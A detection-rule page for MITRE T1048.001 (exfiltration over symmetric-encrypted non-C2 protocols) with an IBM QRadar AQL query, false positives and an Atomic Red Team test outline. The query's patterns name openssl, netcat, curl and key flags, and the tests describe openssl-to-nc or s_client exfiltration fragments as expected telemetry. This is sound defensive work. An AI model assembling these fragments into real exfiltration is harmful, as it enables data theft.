Which SIEM platforms have a T1048.001 detection rule?

df00tech provides T1048.001 (Exfiltration Over Symmetric Encrypted Non-C2 Protocol) detection queries for 7 SIEM platforms: Microsoft Sentinel / Defender, Splunk, Elastic Security (EQL), IBM QRadar (AQL), Sumo Logic CSE, Google Chronicle / SecOps, CrowdStrike LogScale (CQL).

What data sources are required to detect Exfiltration Over Symmetric Encrypted Non-C2 Protocol (T1048.001)?

Detecting Exfiltration Over Symmetric Encrypted Non-C2 Protocol requires the following data sources: Process: Process Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Microsoft Defender for Endpoint.

What severity and confidence is the T1048.001 detection?

The T1048.001 detection is rated high severity with medium confidence.

What are common false positives for T1048.001?

Common false positives for T1048.001 include: Legitimate use of OpenSSL for TLS certificate management, key generation, or PKI operations by system administrators; Backup software using AES encryption to transfer data to cloud storage (e.g., Veeam, Acronis, rsync with encryption flags); Secure file transfer tools such as SFTP, SCP, or WinSCP that use symmetric encryption internally during session.

T1048.001 IBM QRadar · QRadar

Detect Exfiltration Over Symmetric Encrypted Non-C2 Protocol in IBM QRadar

Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. Symmetric encryption algorithms (RC4, AES, ChaCha20, Blowfish) use shared keys on both ends of the channel. Attackers may implement custom encryption over protocols not natively encrypted (HTTP, FTP, DNS) or add extra encryption layers over already-encrypted protocols (HTTPS, SFTP) to obscure data contents from network inspection tools. This technique is distinguished from asymmetric exfiltration by the pre-shared key requirement, often resulting in artifacts such as key material embedded in scripts, configuration files, or command-line arguments.

MITRE ATT&CK

Tactic: Exfiltration
Technique: T1048 Exfiltration Over Alternative Protocol
Sub-technique: T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Canonical reference: https://attack.mitre.org/techniques/T1048/001/

QRadar Detection Query

IBM QRadar (QRadar)

sql

SELECT
  DATEFORMAT(starttime, 'yyyy-MM-dd HH:mm:ss') AS event_time,
  sourceip,
  destinationip,
  destinationport,
  username,
  QIDNAME(qid) AS event_name,
  "ProcessName" AS process_name,
  "CommandLine" AS command_line,
  LONG("BytesSent") AS bytes_sent,
  LOGSOURCETYPENAME(devicetype) AS log_source_type,
  CASE
    WHEN "CommandLine" ILIKE '%aes%'     THEN 'AES'
    WHEN "CommandLine" ILIKE '%rc4%'
      OR "CommandLine" ILIKE '%arcfour%' THEN 'RC4'
    WHEN "CommandLine" ILIKE '%chacha%'  THEN 'ChaCha20'
    WHEN "CommandLine" ILIKE '%des%'     THEN 'DES'
    ELSE 'Unknown'
  END AS encryption_algo,
  CASE
    WHEN "CommandLine" ILIKE '%-nosalt%' THEN 'true'
    ELSE 'false'
  END AS has_nosalt,
  CASE
    WHEN "CommandLine" ILIKE '%-pass pass:%'
      OR "CommandLine" ILIKE '%-k %'
      OR "CommandLine" ILIKE '%-passout%'
      OR "CommandLine" ILIKE '%-passin%' THEN 'true'
    ELSE 'false'
  END AS has_key_material
FROM events
WHERE LOGSOURCETYPENAME(devicetype) IN (
    'Microsoft Windows Security Event Log',
    'Sysmon',
    'Linux OS',
    'Universal DSM',
    'SNARE for Windows'
  )
  AND (
    ("ProcessName" ILIKE '%openssl%' OR "ProcessName" ILIKE '%ccrypt%'
      OR "ProcessName" ILIKE '%mcrypt%' OR "ProcessName" ILIKE '%cryptcat%'
      OR "ProcessName" ILIKE '%aescrypt%' OR "ProcessName" ILIKE '%gpg%')
    OR
    ("ProcessName" ILIKE '%python%' AND (
      "CommandLine" ILIKE '%AES%' OR "CommandLine" ILIKE '%RC4%'
      OR "CommandLine" ILIKE '%encrypt%' OR "CommandLine" ILIKE '%socket%'
      OR "CommandLine" ILIKE '%Cipher%'
    ))
  )
  AND (
    "CommandLine" ILIKE '%enc -aes%'  OR "CommandLine" ILIKE '%-aes-256%'
    OR "CommandLine" ILIKE '%aes256%' OR "CommandLine" ILIKE '%aes128%'
    OR "CommandLine" ILIKE '%enc -rc4%' OR "CommandLine" ILIKE '%-rc4%'
    OR "CommandLine" ILIKE '%arcfour%' OR "CommandLine" ILIKE '%chacha20%'
    OR "CommandLine" ILIKE '%-nosalt%' OR "CommandLine" ILIKE '%-pass pass:%'
    OR "CommandLine" ILIKE '%-passout%' OR "CommandLine" ILIKE '%-passin%'
    OR "CommandLine" ILIKE '%-k %'
  )
  AND (
    "CommandLine" ILIKE '%-connect%' OR "CommandLine" ILIKE '%socket%'
    OR "CommandLine" ILIKE '%netcat%'  OR "CommandLine" ILIKE '%http%'
    OR "CommandLine" ILIKE '%curl%'    OR "CommandLine" ILIKE '%wget%'
    OR "CommandLine" ILIKE '%ftp%'     OR "CommandLine" ILIKE '%tcp%'
  )
  AND NOT (
    destinationip INSUBNET '10.0.0.0/8'
    OR destinationip INSUBNET '172.16.0.0/12'
    OR destinationip INSUBNET '192.168.0.0/16'
    OR destinationip INSUBNET '127.0.0.0/8'
    OR destinationip IS NULL
  )
  AND starttime > NOW() - 86400000
ORDER BY starttime DESC

high severity medium confidence

AQL query detecting process events where symmetric encryption tools (openssl, ccrypt, mcrypt, cryptcat, gpg, aescrypt) or Python with crypto library imports are invoked with cipher-specific arguments and network connectivity targets, making connections to public IP space. Applies multi-field ILIKE matching across ProcessName and CommandLine to surface AES/RC4/ChaCha20 encryption combined with network exfiltration indicators. Includes inline CASE classification of encryption algorithm and key material presence for analyst triage.

Data Sources

QRadar SIEM with Windows Security Event Log DSMSysmon for Windows (process create / network connect events)Linux OS DSM (auditd or syslog process tracking)Universal DSM for generic endpoint process telemetry

Required Tables

events

False Positives & Tuning

Authorized openssl invocations for TLS certificate signing, CSR generation, or OCSP stapling against public PKI infrastructure
Python-based ETL or ML pipelines using AES-encrypted communication with cloud data warehouses or APIs
Security orchestration playbooks calling encryption utilities during automated incident response or data sanitization
Legitimate ccrypt or gpg file encryption followed by SFTP/FTPS upload to authorized external storage providers

Download portable Sigma rule (.yml)

Other platforms for T1048.001

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

Test 1Exfiltrate File Using OpenSSL AES Encryption over HTTP
Expected signal: Sysmon Event ID 1: Process Create for openssl with CommandLine containing 'enc -aes-256-cbc -nosalt -k' and the key material. Sysmon Event ID 1: Process Create for curl with destination URL. Sysmon Event ID 3: Network connection from curl to destination IP:8080. Sysmon Event ID 11: File Create for /tmp/exfil_payload.enc. Auditd records showing execve syscalls for openssl and curl with full argument lists.
Test 2Symmetric Encrypted Exfiltration via Python Script with RC4
Expected signal: Sysmon Event ID 1: Process Create for python3 with CommandLine containing 'rc4', 'socket', 'encrypt', and 'connect'. Sysmon Event ID 3: Network connection from python3 to 192.168.1.200:9001 (non-standard port, high-confidence exfiltration indicator). Auditd execve syscall with full Python -c command argument.
Test 3OpenSSL Encrypted Data Transfer via Named Pipe to Netcat
Expected signal: Sysmon Event ID 1: Process Create for openssl with '-aes-256-cbc -k <key> -nosalt' in CommandLine. Sysmon Event ID 1: Process Create for nc targeting 192.168.1.200:4444 (classic reverse shell port). Sysmon Event ID 3: Network connection from nc to external IP on port 4444. Possible Sysmon Event ID 1 for tar as parent/sibling process. Linux auditd: execve records for all three commands (tar, openssl, nc).
Test 4Exfiltration via OpenSSL s_client Over HTTPS Port with Symmetric Key
Expected signal: Sysmon Event ID 1: First openssl process with 'enc -aes-256-cbc -k TeamPreSharedKey99 -nosalt' in CommandLine. Sysmon Event ID 1: Second openssl process with 's_client -connect 192.168.1.200:443' in CommandLine. Sysmon Event ID 3: Network connection from openssl s_client to port 443. Sysmon Event ID 11: File Create for /tmp/inner_encrypted.bin. The double-process pattern (enc then s_client) is highly distinctive.

Last updated: 2026-04-16 Research depth: deep

References (10)

Response Playbook

1. Examine the full command line and decode any Base64 content...
2. Identify the parent process chain and user context...
3. Check for concurrent network connections from the process...

Investigation Guide

Related techniques: T1027, T1105, T1562.001...
Forensic artifacts: PSReadLine history, Prefetch, ScriptBlock logs...

Atomic Red Team Tests

Test 1: Encoded command execution...
Test 2: Download cradle via Net.WebClient...

Unlock Pro Content

Get the full detection package for T1048.001 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance

Related Detections

Detect Exfiltration Over Symmetric Encrypted Non-C2 Protocol in IBM QRadar

MITRE ATT&CK

QRadar Detection Query

Data Sources

Required Tables

False Positives & Tuning

Other platforms for T1048.001

Testing Methodology

Response Playbook

Investigation Guide

Atomic Red Team Tests

Unlock Pro Content

Related Detections

Parent Technique

Related Sub-techniques

Related Techniques

Same Tactic: Exfiltration

Popular Detections

MITRE ATT&CK

QRadar Detection Query

Data Sources

Required Tables

False Positives & Tuning

Other platforms for T1048.001

Testing Methodology

Unlock Pro Content

Related Detections

Parent Technique

Related Sub-techniques

Related Techniques

Same Tactic: Exfiltration

Popular Detections

Get new detections in your inbox